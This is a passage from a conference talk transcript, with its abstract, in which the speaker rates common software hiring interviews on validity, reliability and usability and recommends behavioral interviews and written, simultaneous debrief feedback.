between candidates ultimately is going to give you extra noise that you're not measuring. What that means is that you should have a schedule and it should be a consistent schedule. You should know who your interviewers are and your candidate should know that as well. Your interviewers need to be trained. They need to understand what it is that they're doing. They need to have a scoring rubric. And I'm going to contend here that your candidate should probably know what you're measuring. 
Because if you're being sneaky about it, it's probably a stupid question. Right? So if you can do those things — tell them what to expect — you're going to put them more at ease, you're going to get more signal. First thing they go into: code writing. Has anyone implemented a, we'll say, a red-black tree at work in the last year? No? No hands? Okay. Good. Don't do algorithms. They look like code. They look like code we use, but in reality that's not how we build software. Nobody ever implements red-black trees from memory at work. Right? So there's a problem. They feel valid, but they're really not, because the correspondence is very low. Are they reliable? No, not really. They have some of the same recency bias. Somebody who studies, somebody who just graduated CS, is probably going to remember this better than somebody who's got a bunch of years of experience. And so, great — now you have an inverse selection. You select for inexperience, because those people remember algorithms. Good work. Usability? Yeah, it's probably pretty usable. Right? I think a better version of this would be if you were to take an algorithm — like, don't pick something with somebody famous's name, Dijkstra's anything or, you know, any of that — pick an algorithm that you make up, and have them implement that from a sheet of paper. Say, here's the algorithm, here's your laptop, do that. This defeats the recency bias. This is an actual test of what we do for software: just translating requirements into working code. Don't give algorithms. The even worse version: whiteboard coding. And everyone's expecting me to hit on whiteboard coding, and I will, because it's dumb. If at your job you're required to whiteboard code — not if you have the option, not if people tend to, but if you're required to whiteboard code — please, by all means, go ahead. If not, what you are measuring is a skill that people don't use unless they are practicing interviews. In that case, just give them a fucking laptop. It's really not that hard. And then the live bug fix. Does anyone do this? Wait, don't raise your hands. It's technically illegal. If you're not paying your candidates, you can't have them work on production code in most states. Check your local laws. But so the cool thing about this, validity-wise: this is 100% valid, right? Because this is the work. You could not get more valid than this. That's cool. The problem becomes the reliability. If you're working on real code, you generally can't repeat the same problem — or if you do, you have serious problems and shouldn't be hiring. So usually what that means is we have this trade-off: either I spend a ton of time in my backlog finding things that are similar-ish, in which case it's not usable, or I just kind of pluck something out, in which case it's not reliable. Remember parallel-forms reliability. But also it's illegal, so probably you shouldn't do it. So now that they're exhausted, they've written some code, let's do some problem-solving. Does anyone know what interview question this is? I actually got hired on this once. It's dudes, they're buried up to their necks, and they've got hats on, and, like, you have to tell who's wearing what color hat, and if they do that, then, like, they don't get killed or something. This is just dumb. How about validity? No. How about reliability? No. How about usability? Yeah, great usability. Awesome. But you've measured nothing. Not only that, but your candidates are probably looking this up.
Again, if you're a boot camper, if you're looking for a job, just go look up, like, the six or seven of these that everybody uses. Learn them cold, pretend that you're having a hard time with it, and then come up with the trick. Ta-da. A little bit better: case studies. Given a hypothetical, how would you deal with it? This can be valid — you can use your existing work. This can be reliable — you can give the same case study based on historical precedent. You need to modulate a little bit. If you have a senior developer and you are giving them, say, some architectural problem that you can't solve, it's an issue. If you have a junior developer and you're giving them effectively any architectural problem, that's not something that's in their skill set; it's probably not what you mean to measure. But even better — this is my favorite kind of interviewing — behavioral interviewing. Has anyone ever seen this? So this takes the same form every single time: it's "tell me about a time when X." And the reason this works is that, despite what they have to say in the financial sector, past performance absolutely predicts future performance. Absolutely does. And so this is a great interview insofar as you can test somebody's real experience. It's valid — yeah, I know, great work. It's reliable — you can test the same thing over and over again. And then usability: there's a little bit of a challenge. It turns out that to get good answers out of people, you have to train them on this kind of interviewing. But that's okay. You can overcome this. And then culture fit. If your culture fit interview looks like every one I've seen before, it's your CTO or your director going in, shooting the shit for about 40 minutes, and then deciding yes or no, right? So you've had this before. You're measuring for "people like me." There's no criteria. There's nothing. There's a gut feel. And the way the gut feel works is that it takes into account every one of our preconceived notions. So it is, again, almost zero validity. My answer to you should be "just don't do these," but you're going to do them anyway. So if you're not going to listen to me, at least think about the things in your culture that do cause people to be successful — "we ship first, all the time," "we ship the highest quality, all the time," right? "We teach everybody," or "we're independently capable" — these kinds of things that actually could measure success — and at least measure those. But you're better off just not using them. So you send the person home. Now that they're gone, no more problems, right? Yeah. So the way the debrief ends up working, all the time, is of course we get into a circle and then everybody weighs in. It's kind of like when you do rock, paper, scissors as a kid — you're like, rock, paper, scissors — people read each other, right? They read each other socially. This is what happens. Or you end up talking to the person on your left: I think this person's like an eight out of ten. They're like, yeah, no, that was the worst. You go, yeah... a six. Because I'm like, well, I don't want to be an idiot. So the way that we fix this: we write it down, first of all. Have your interviewers write down specific, objective feedback — not "she was cool," but "she missed the test coverage issue in this question," "she solved the problem with 10 minutes to spare." And then share all that feedback at once, so that nobody can cheat. Make sense? Cool. So, recap. If you want to hire well — welcome, time for the recap.
If you want to hire well, you need to pick a set of constructs and you need to design and test interviews that are valid, reliable, and usable. Cool? There's one more thing I want to talk about before we actually go. The reason is the point at which I submitted this talk. I was having an issue with a couple clients where they had teams that we'll say were more than a little bit homogenous. And so I talked to them about their interview process. And what they always said is a feedback I get all the time is we only want to hire people. We only hire the best. We don't want to lower the bar. And I hate this, right? But I couldn't tell you precisely why. Like I couldn't give you the reasoning. I know it's wrong, but I couldn't give you the reasoning. And I understand the reasoning now as part of this talk. And the reality is that for a lot of us, what they believe, they're not bad people, but they believe they have this bar and you're over it or you're under it. And in that sense, of course, you don't want to lower it. But the reality is the bar doesn't look like this. The bar is like weird and tilted and fucked up because of all these extra things that you're measuring that have nothing to do with job success. And so I'm going to say we should probably actually raise the bar. Most people who have interviews are not nearly as tough as they think they are. But to do that, first we need to make sure that the bar is straight. Cool? Thank you. Applause.
|
Nothing makes or breaks our teams like the members they hire. And so we rate and quiz, assign homework and whiteboard algorithms until candidates are blue in the face. But does it work? In this session, we’ll unpack common interviews and how they stack up with research into predicting performance. We’ll learn to design interviews that work, what kinds don’t work at all, and how to tell the difference, with science!
|